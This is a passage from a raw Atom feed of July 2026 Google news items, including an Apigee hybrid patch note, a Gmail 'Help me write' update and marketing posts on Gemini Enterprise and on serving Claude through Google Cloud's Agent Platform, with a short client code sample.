&lt;h3&gt;Announcement&lt;/h3&gt;
&lt;h3 id="v1156"&gt;v1.15.6&lt;/h3&gt;
&lt;p&gt;On July 15, 2026 we released an updated version of the Apigee hybrid software, v1.15.6.&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;For information on upgrading, see &lt;a href="https://docs.cloud.google.com/apigee/docs/hybrid/v1.15/upgrade"&gt;Upgrading Apigee hybrid to version v1.15.6&lt;/a&gt;.&lt;/li&gt;
&lt;li&gt;For information on new installations, see &lt;a href="https://docs.cloud.google.com/apigee/docs/hybrid/v1.15/big-picture"&gt;The big picture&lt;/a&gt;.&lt;/li&gt;
&lt;/ul&gt;
&lt;aside class="note"&gt;&lt;strong&gt;Note:&lt;/strong&gt;&lt;span&gt; This is a patch release: The container images used in patch releases are integrated with the Apigee hybrid Helm charts. Upgrading to a patch via the Helm chart automatically updates the images. No manual image changes are typically needed. For information on container image support in Apigee hybrid releases, see &lt;a href="https://docs.cloud.google.com/apigee/docs/release/apigee-release-process#apigee-hybrid-container-images"&gt;Apigee release process&lt;/a&gt;.&lt;/span&gt;&lt;/aside&gt;
&lt;h3&gt;Security&lt;/h3&gt;
&lt;p&gt;Various security and CVE fixes are included in this release.&lt;/p&gt;</content>
    <link href="https://docs.cloud.google.com/release-notes#July_15_2026" rel="alternate"/>
    <category term="Cloud Release Notes"/>
    <published>2026-07-15T07:00:00+00:00</published>
  </entry>
  <entry>
    <id>https://blog.google/products-and-platforms/devices/pixel/pixel-care-plus-open-enrollment-2026</id>
    <title>It's not too late to get Pixel Care+ for your Pixel 9 or 10.</title>
    <updated>2026-07-14T22:00:00+00:00</updated>
    <content type="html">&lt;img src="https://storage.googleapis.com/gweb-uniblog-publish-prod/images/PixelCare.max-600x600.format-webp.webp" /&gt;From July 13 to August 2, sign up for Pixel Care+ to get accidental damage coverage and $0 battery and screen repairs.</content>
    <link href="https://blog.google/products-and-platforms/devices/pixel/pixel-care-plus-open-enrollment-2026" rel="alternate"/>
    <category term="The Keyword"/>
    <published>2026-07-14T22:00:00+00:00</published>
  </entry>
  <entry>
    <id>https://blog.google/company-news/outreach-and-initiatives/arts-culture/the-met-ai-initiatives</id>
    <title>The Met and Google Arts &amp; Culture celebrate 15 years of innovation</title>
    <updated>2026-07-14T20:00:00+00:00</updated>
    <content type="html">The Met Prototypes &amp; Play</content>
    <link href="https://blog.google/company-news/outreach-and-initiatives/arts-culture/the-met-ai-initiatives" rel="alternate"/>
    <category term="The Keyword"/>
    <published>2026-07-14T20:00:00+00:00</published>
  </entry>
  <entry>
    <id>https://cloud.google.com/blog/products/ai-machine-learning/google-named-a-leader-in-idc-marketscape</id>
    <title>Google named a Leader in the 2026 IDC MarketScape for Worldwide Foundation Model Software</title>
    <updated>2026-07-14T18:00:00+00:00</updated>
    <content type="html">&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;For years, we’ve built with a clear priority: putting the practical needs of the enterprise first. Long before generative AI dominated the headlines, we were focused on building the global infrastructure, security frameworks, and data platforms that power the world's largest organizations. We’ve always believed that technology is only as good as its reliability, security, and predictability in production.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;By anchoring our frontier research to this enterprise foundation, we can deliver models built specifically for business impact. We believe that approach is why Google has been named a Leader in the IDC MarketScape: Worldwide Foundation Model Software 2026 Vendor Assessment&lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: super;"&gt;1&lt;/span&gt;&lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt;. We believe this placement highlights our history of turning cutting-edge frontier research into secure, production-grade systems that developers can deploy at scale.&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-image_full_width"&gt;






  
    &lt;div class="article-module h-c-page"&gt;
      &lt;div class="h-c-grid"&gt;
  

    &lt;figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      "&gt;

      
      
        
        &lt;img alt="high-res_US54427726tabfig_1" src="https://storage.googleapis.com/gweb-cloudblog-publish/images/high-res_US54427726tabfig_1.max-1000x1000.png" /&gt;
        
        &lt;/a&gt;
      
    &lt;/figure&gt;

  
      &lt;/div&gt;
    &lt;/div&gt;
  




&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;We believe Google’s position as a Leader highlights the exact momentum we are seeing in the market. We believe this placement validates the unique strength of our integrated, first-party AI stack.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;By translating Google DeepMind’s continuous pipeline of fundamental research into production-grade business products, we unite our robust infrastructure and foundation model software to work together seamlessly as a single, unified solution.&lt;/span&gt;&lt;/p&gt;
&lt;h3&gt;&lt;strong style="vertical-align: baseline;"&gt;Gemini Enterprise: A unified system for the agentic era&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;A great foundation model is only as valuable as an organization's ability to safely put it to work. In the enterprise, that value is realized when models are given the tools, memory, and agency to act as autonomous partners – moving from simple prompt-and-response text to dynamic agents that can execute complex business workflows.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Gemini Enterprise serves as this end-to-end system. It brings our most powerful developer capabilities and user-facing tools together into a single architecture, featuring the Gemini Enterprise app as the front door for everyday business teams to interact with AI, and the Gemini Enterprise Agent Platform for developers to orchestrate them behind the scenes.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Agent Platform abstracts away the underlying complexity of how technical teams build, scale, govern, and optimize these agents – whether they are handling customer-facing workflows or managing internal operations. Any agent engineered on the platform can be instantly surfaced in the Gemini Enterprise app, giving your workforce immediate access to secure, custom-built tools. Because rigorous governance, enterprise security, and cryptographic identity are baked into the foundation by default, organizations can stop worrying about managing technological risk and start focusing entirely on driving agent-led business outcomes.&lt;/span&gt;&lt;/p&gt;
&lt;h3&gt;&lt;strong style="vertical-align: baseline;"&gt;Powered by Gemini&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Our latest models are built specifically to orchestrate and execute complex, multi-step actions. At I/O this year, we kicked off the Gemini 3.5 series with the release of Gemini 3.5 Flash. It delivers intelligence on multiple dimensions at speeds you have come to expect from the Flash series. It’s ideal for tackling long-horizon agentic tasks. Google DeepMind engineered these models from the ground up using our purpose-built AI infrastructure. This unique co-design of the model and hardware allows us to train deeper reasoning capabilities faster and more efficiently with every new generation.&lt;/span&gt;&lt;strong style="vertical-align: baseline;"&gt; &lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Developers can build agents using Gemini 3.5 Flash on the &lt;/span&gt;&lt;a href="https://console.cloud.google.com/agent-platform/overview"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Gemini Enterprise Agent Platform&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;, &lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt;or use it in your projects in &lt;/span&gt;&lt;a href="http://aistudio.google.com/apps" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Google AI Studio&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; and &lt;/span&gt;&lt;a href="https://antigravity.google/" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Antigravity&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;. &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Business users can use Gemini 3.5 Flash in the &lt;/span&gt;&lt;a href="https://cloud.google.com/gemini-enterprise?e=48754805"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Gemini Enterprise app&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; to help discover, create, and use the best of Google AI in their workflows starting today.&lt;/span&gt;&lt;/p&gt;
&lt;h3&gt;&lt;strong style="vertical-align: baseline;"&gt;Get started&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;&lt;a href="https://cloud.google.com/resources/content/idc-marketscape-2025-ww-foundation-models"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Download&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; the &lt;/span&gt;&lt;strong style="vertical-align: baseline;"&gt;IDC MarketScape: Worldwide Foundation Model Software 2026 Vendor Assessment&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; excerpt to learn why organizations are choosing Google Cloud.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Explore &lt;/strong&gt;&lt;a href="https://cloud.google.com/ai?e=48754805"&gt;&lt;strong style="text-decoration: underline; vertical-align: baseline;"&gt;Gemini Enterprise&lt;/strong&gt;&lt;/a&gt;&lt;strong style="vertical-align: baseline;"&gt; today, or speak to your Google Cloud account representative to schedule a hands-on technical workshop.&lt;/strong&gt;&lt;/p&gt;
&lt;hr /&gt;
&lt;p&gt;&lt;sup&gt;&lt;span style="font-style: italic; vertical-align: baseline;"&gt;1. IDC MarketScape: Worldwide Foundation Model Software 2026 Vendor Assessment, Doc #US54427726, July 2026&lt;br /&gt;&lt;/span&gt;&lt;/sup&gt;&lt;sup&gt;&lt;span style="font-style: italic; vertical-align: baseline;"&gt;IDC MarketScape vendor analysis model is designed to provide an overview of the competitive fitness of technology and suppliers in a given market. The research methodology utilizes a rigorous scoring methodology based on both qualitative and quantitative criteria that results in a single graphical illustration of each supplier’s position within a given market. The Capabilities score measures supplier product, go-to-market and business execution in the short-term. The Strategy score measures alignment of supplier strategies with customer requirements in a 3-5-year timeframe. Supplier market share is represented by the size of the icons.&lt;/span&gt;&lt;/sup&gt;&lt;/p&gt;&lt;/div&gt;</content>
    <link href="https://cloud.google.com/blog/products/ai-machine-learning/google-named-a-leader-in-idc-marketscape" rel="alternate"/>
    <category term="Google Cloud"/>
    <published>2026-07-14T18:00:00+00:00</published>
  </entry>
  <entry>
    <id>https://workspaceupdates.googleblog.com/2026/07/new-refinement-capabilities-allow-custom-editing-with-Help-me-write-in-Gmail.html</id>
    <title>New refinement capabilities allow custom editing with Help me write in Gmail</title>
    <updated>2026-07-14T17:28:59+00:00</updated>
    <content type="html">&lt;p&gt;Users can now edit and revise their email drafts in Gmail via the prompt bar, using custom refine instructions in &lt;a href="https://support.google.com/mail/answer/13955415?hl=en&amp;amp;co=GENIE.Platform%3DDesktop" target="_blank"&gt;Help me write&lt;/a&gt;. Previously the refines were limited to preset options like Polish, Formalize, and Shorten. Now if your first draft isn’t quite perfect, you can provide a precise follow-up prompt in your own words to further refine it, and even undo or redo any edits you make.&lt;/p&gt;&lt;p&gt;Whether you need to add a missing detail to the second line or include a deadline for your request, simply type the instruction and Gmail will instantly update the draft for you.&lt;/p&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhKMJB0VHVJcnPMsm-gclcPVASU_KR3mJodlJzwHcZ5gDVKiVvEQrl6WFB2zvMvCxRAuctj4GW-2fyIzHgx5mEN6AhfaMMTbIkxI2Hw9MWaBvkT_Qwx6-ScyKgEu5zWSC2y6q1vepeEf_lUGkoblz9u2XTZdefVdcNJb5_FG39bjbZO4ZWDZWXGJ2QI96c/s640/New%20refinement%20capabilities%20allow%20custom%20editing%20with%20Help%20me%20write%20in%20Gmail%20%20-%205478.gif" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhKMJB0VHVJcnPMsm-gclcPVASU_KR3mJodlJzwHcZ5gDVKiVvEQrl6WFB2zvMvCxRAuctj4GW-2fyIzHgx5mEN6AhfaMMTbIkxI2Hw9MWaBvkT_Qwx6-ScyKgEu5zWSC2y6q1vepeEf_lUGkoblz9u2XTZdefVdcNJb5_FG39bjbZO4ZWDZWXGJ2QI96c/s1600/New%20refinement%20capabilities%20allow%20custom%20editing%20with%20Help%20me%20write%20in%20Gmail%20%20-%205478.gif" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;h3 style="text-align: left;"&gt;Getting started&lt;/h3&gt;&lt;p&gt;&lt;/p&gt;&lt;ul style="text-align: left;"&gt;&lt;li&gt;&lt;b&gt;Admins: &lt;/b&gt;This feature is available by default if both &lt;a href="https://knowledge.workspace.google.com/admin/gemini/manage-access-to-gemini-features-in-workspace-services" target="_blank"&gt;Gemini for Workspace in Gmail is enabled&lt;/a&gt; and &lt;a href="https://knowledge.workspace.google.com/admin/gemini/control-workspace-intelligence" target="_blank"&gt;Workspace Intelligence access to Gmail is enabled&lt;/a&gt;.&lt;/li&gt;&lt;li&gt;&lt;b&gt;End users: &lt;/b&gt;This feature is available by default. Visit the Help Center article to &lt;a href="https://support.google.com/mail/answer/13955415?hl=en&amp;amp;co=GENIE.Platform%3DDesktop" target="_blank"&gt;learn more about drafting emails with Gemini in Gmail&lt;/a&gt;.&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;&lt;/p&gt;&lt;h3 style="text-align: left;"&gt;Rollout pace&lt;/h3&gt;&lt;p&gt;&lt;/p&gt;&lt;ul style="text-align: left;"&gt;&lt;li&gt;&lt;a href="https://support.google.com/a/answer/172177" target="_blank"&gt;Rapid Release and Scheduled Release domains:&lt;/a&gt;&amp;nbsp;Rolling out now, with expected completion by July 20, 2026&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;&lt;/p&gt;&lt;h3 style="text-align: left;"&gt;Availability&lt;/h3&gt;&lt;p&gt;&lt;/p&gt;&lt;ul style="text-align: left;"&gt;&lt;li&gt;&lt;b&gt;Business: &lt;/b&gt;Business Starter, Standard, and Plus&lt;/li&gt;&lt;li&gt;&lt;b&gt;Enterprise:&lt;/b&gt; Enterprise Starter, Standard, and Plus&lt;/li&gt;&lt;li&gt;&lt;b&gt;Consumer: &lt;/b&gt;Google AI Plus, Pro, and Ultra&lt;/li&gt;&lt;li&gt;&lt;b&gt;Other Editions: &lt;/b&gt;Frontline Plus&lt;/li&gt;&lt;li&gt;&lt;b&gt;Education Add-ons:&lt;/b&gt; Google AI Pro for Education&lt;/li&gt;&lt;li&gt;&lt;b&gt;Other Add-ons: &lt;/b&gt;AI Expanded Access&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;&lt;/p&gt;&lt;h3 style="text-align: left;"&gt;Resources&lt;/h3&gt;&lt;p&gt;&lt;/p&gt;&lt;ul style="text-align: left;"&gt;&lt;li&gt;Gmail Help: &lt;a href="https://support.google.com/mail/answer/13955415?hl=en&amp;amp;co=GENIE.Platform%3DDesktop" target="_blank"&gt;Draft emails with Gemini in Gmail&lt;/a&gt;&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;&lt;/p&gt;</content>
    <link href="https://workspaceupdates.googleblog.com/2026/07/new-refinement-capabilities-allow-custom-editing-with-Help-me-write-in-Gmail.html" rel="alternate"/>
    <category term="Workspace Updates"/>
    <published>2026-07-14T17:28:59+00:00</published>
  </entry>
  <entry>
    <id>https://cloud.google.com/blog/products/ai-machine-learning/claude-at-scale-on-google-cloud-frontier-ai-built-for-enterprise-production</id>
    <title>Claude at scale on Google Cloud: Frontier AI, built for enterprise production</title>
    <updated>2026-07-14T16:00:00+00:00</updated>
    <content type="html">&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Running frontier AI in production is demanding — accelerators to manage, latency to hold steady across continents, regulated data to keep in-region, and long-context requests to serve reliably. Claude on Google Cloud is built for exactly this. &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Like &lt;/span&gt;&lt;a href="https://en.wikipedia.org/wiki/Water_Lilies_(Monet_series)" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Monet and water lilies&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;, frontier models and the enterprise platforms are often better together. In our case, Claude brings the reasoning, and Google Cloud brings the managed infrastructure, global reach, and compliance posture that enterprises already run on. Calling Claude becomes operationally identical to calling any other Google Cloud service — same &lt;/span&gt;&lt;a href="https://cloud.google.com/products/iam?hl=en"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Identity and Access Management&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; (IAM), same &lt;/span&gt;&lt;a href="https://cloud.google.com/security/vpc-service-controls?hl=en"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;VPC Service controls&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;, same observability — so teams are able to spend their time building features instead of running inference infrastructure.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;This post walks through what &lt;/span&gt;&lt;a href="https://code.claude.com/docs/en/google-vertex-ai" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Claude on Google Cloud&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; delivers in production across four areas: &lt;/span&gt;&lt;/p&gt;
&lt;ol&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Managed infrastructure that gives engineers their time back &lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Global endpoints that hold latency low, and uptime high for a worldwide user base &lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Security and data-sovereignty controls inherited straight from Google Cloud&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Serving-layer features that keep cost and performance optimized at scale.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ol&gt;
&lt;h3&gt;&lt;strong style="vertical-align: baseline;"&gt;Managed infrastructure that frees engineering time&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Claude on Google Cloud runs on fully managed infrastructure, so enterprise teams ship features instead of building clusters. Compute provisioning, auto-scaling logic, load balancing, and failover at frontier-model scale are handled by the platform — work that would otherwise occupy multiple teams full-time. &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Claude is available through &lt;/span&gt;&lt;a href="https://console.cloud.google.com/agent-platform/overview?project=genai-demos"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Agent Platform's&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; &lt;/span&gt;&lt;a href="https://cloud.google.com/model-garden"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Model Garden&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; as a Model-as-a-Service offering, ready to use over standard REST / JSON over HTTP/1.1 or HTTP/2 endpoints. Invoking Claude is operationally identical to invoking any other Google Cloud service: the same&lt;/span&gt; &lt;a href="https://docs.cloud.google.com/iam/docs/reference/rest/v1/Policy"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;IAM policies&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;, the same VPC controls, and the same observability stack via &lt;/span&gt;&lt;a href="https://cloud.google.com/logging?utm_source=google&amp;amp;utm_medium=cpc&amp;amp;utm_campaign=Cloud-SS-DR-GCP-1713658-GCP-DR-NA-US-en-Google-SKWS-BRO-logging&amp;amp;utm_content=c-Hybrid+%7C+SKWS+-+BRO+%7C+Txt-AppMod-Ops+Tools-Cloud+Logging-328043335084&amp;amp;utm_term=cloud+logging&amp;amp;gclsrc=aw.ds&amp;amp;gad_source=1&amp;amp;gad_campaignid=23757224319&amp;amp;gclid=CjwKCAjwxb7RBhA5EiwAQ-AAdLQuFQ2mYRO7NCYspPzeGRvI-CmYLLx-Sb0bBHOyw4PsIoIKGuAR1BoCTacQAvD_BwE&amp;amp;hl=en"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Cloud Logging&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; and &lt;/span&gt;&lt;a href="https://cloud.google.com/monitoring?hl=en"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Cloud Monitoring&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;. &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Serving Claude takes a few lines of Python using the &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;AnthropicVertex&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; client:&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-code"&gt;&lt;dl&gt;
    &lt;dt&gt;code_block&lt;/dt&gt;
    &lt;dd&gt;&amp;lt;ListValue: [StructValue([(&amp;#x27;code&amp;#x27;, &amp;#x27;from anthropic import AnthropicVertex\r\n\r\nclient = AnthropicVertex(\r\n    project_id=&amp;quot;your-project-id&amp;quot;,\r\n    region=&amp;quot;us&amp;quot;\r\n)\r\n\r\nmessage = client.messages.create(\r\n    model=&amp;quot;claude-opus-4-8&amp;quot;,\r\n    max_tokens=1024,\r\n    messages=[{&amp;quot;role&amp;quot;: &amp;quot;user&amp;quot;, &amp;quot;content&amp;quot;: &amp;quot;Analyze this system architecture.&amp;quot;}]\r\n)&amp;#x27;), (&amp;#x27;language&amp;#x27;, &amp;#x27;&amp;#x27;), (&amp;#x27;caption&amp;#x27;, &amp;lt;wagtail.rich_text.RichText object at 0x7f7a7bf0c0d0&amp;gt;)])]&amp;gt;&lt;/dd&gt;
&lt;/dl&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;The same &lt;/span&gt;&lt;a href="https://github.com/anthropics/anthropic-sdk-python" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;AnthropicVertex&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; client handles prompt caching, tool use, structured outputs, streaming, and adaptive thinking; for batch inference, use &lt;/span&gt;&lt;a href="https://docs.cloud.google.com/gemini-enterprise-agent-platform/models/partner-models/claude/batch#request_a_batch_prediction"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Vertex AI Batch Prediction&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;. Authentication uses Application Default Credentials; requests automatically inherit your project's IAM and&lt;/span&gt; &lt;a href="https://cloud.google.com/vpc"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;VPC&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; configuration. &lt;/span&gt;&lt;/p&gt;
&lt;h3&gt;&lt;strong style="vertical-align: baseline;"&gt;Global reach with consistent latency and built-in failover&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Serving a worldwide user base from a single endpoint produces high tail latency and a single point of failure. Most enterprises can't replicate inference infrastructure across continents while keeping performance consistent.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Agent Platform exposes three endpoint types for Claude, each solving a different production requirement:&lt;/span&gt;&lt;/p&gt;
&lt;ol&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;a href="https://cloud.google.com/blog/products/ai-machine-learning/global-endpoint-for-claude-models-generally-available-on-vertex-ai"&gt;&lt;strong style="text-decoration: underline; vertical-align: baseline;"&gt;Global endpoints&lt;/strong&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; route requests to a region with available AI compute capacity. For example, if &lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt;us-central1&lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt; is capacity-constrained, traffic redirects to &lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt;europe-west1&lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt; or another region with available capacity. That’s automatic failover and geographic load balancing without application-side routing logic. Global endpoints are ideal for maximum availability and lowest cost.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Regional endpoints&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; like &lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt;us-east5&lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt; or &lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt;europe-west1&lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt; keep prompts, completions, and intermediate state inside a specific geographical boundary, making it ideal for low latency and data-residency requirements.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;a href="https://cloud.google.com/blog/products/ai-machine-learning/multi-region-endpoints-for-claude-available-on-vertex-ai"&gt;&lt;strong style="text-decoration: underline; vertical-align: baseline;"&gt;Multi-region endpoints&lt;/strong&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; give U.S. or EU data residency without single-region dependency. They dynamically route across regional endpoints  providing built-in resilience against regional outages and capacity constraints.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;The diagram below shows how applications reach Claude through these endpoint types, and how the Agent Platform serving layer routes traffic to the Compute AI clusters across regions:&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-image_full_width"&gt;






  
    &lt;div class="article-module h-c-page"&gt;
      &lt;div class="h-c-grid"&gt;
  

    &lt;figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      "&gt;

      
      
        
        &lt;img alt="1 _GC_BlogGraphics_Anthropic" src="https://storage.googleapis.com/gweb-cloudblog-publish/images/1__GC_BlogGraphics_Anthropic.max-1000x1000.jpg" /&gt;
        
        &lt;/a&gt;
      
        &lt;figcaption class="article-image__caption "&gt;&lt;p&gt;Serving Claude Models From Regional &amp;amp; Global Endpoints&lt;/p&gt;&lt;/figcaption&gt;
      
    &lt;/figure&gt;

  
      &lt;/div&gt;
    &lt;/div&gt;
  




&lt;/div&gt;
&lt;div class="block-image_full_width"&gt;






  
    &lt;div class="article-module h-c-page"&gt;
      &lt;div class="h-c-grid"&gt;
  

    &lt;figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      "&gt;

      
      
        
        &lt;img alt="2_GC_BlogGraphics_Anthropic" src="https://storage.googleapis.com/gweb-cloudblog-publish/images/2_GC_BlogGraphics_Anthropic.max-1000x1000.jpg" /&gt;
        
        &lt;/a&gt;
      
        &lt;figcaption class="article-image__caption "&gt;&lt;p&gt;Serving Claude Models From Multi-Region Endpoints&lt;/p&gt;&lt;/figcaption&gt;
      
    &lt;/figure&gt;

  
      &lt;/div&gt;
    &lt;/div&gt;
  




&lt;/div&gt;
&lt;div class="block-image_full_width"&gt;






  
    &lt;div class="article-module h-c-page"&gt;
      &lt;div class="h-c-grid"&gt;
  

    &lt;figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      "&gt;

      
      
        
        &lt;img alt="3_GC_BlogGraphics_Anthropic" src="https://storage.googleapis.com/gweb-cloudblog-publish/images/3_GC_BlogGraphics_Anthropic.max-1000x1000.jpg" /&gt;
        
        &lt;/a&gt;
      
        &lt;figcaption class="article-image__caption "&gt;&lt;p&gt;Serving Claude Models From Regional Endpoints&lt;/p&gt;&lt;/figcaption&gt;
      
    &lt;/figure&gt;

  
      &lt;/div&gt;
    &lt;/div&gt;
  




&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;h3&gt;&lt;strong style="vertical-align: baseline;"&gt;Enterprise security and data sovereignty built in&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Regulated workloads — financial services, healthcare, and government — get enterprise-grade security and data sovereignty without trading compliance for convenience, and without re-engineering the hardest layer to control: inference, where prompts, completions, and intermediate state all flow through the serving stack.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Claude on Agent Platform inherits Google Cloud's full security posture. FedRAMP High and HIPAA compliance enable deployment in government, healthcare, and financial services environments. VPC Service Controls let organizations define a perimeter around Agent Platform resources, preventing data exfiltration. IAM-native access control governs Claude endpoints with the same roles and policies that protect every other Google Cloud resource — no separate API keys to manage or rotate. Cloud Logging and Cloud Monitoring provide near real-time visibility into token usage, error rates, latency, and quota consumption.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Combined with the regional and multi-region endpoints above, this gives regulated customers a path to running frontier AI in production without re-auditing their compliance posture.&lt;/span&gt;&lt;/p&gt;
